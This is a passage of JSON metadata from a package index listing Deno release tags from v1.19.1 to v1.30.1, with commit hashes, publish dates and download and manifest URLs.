releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url"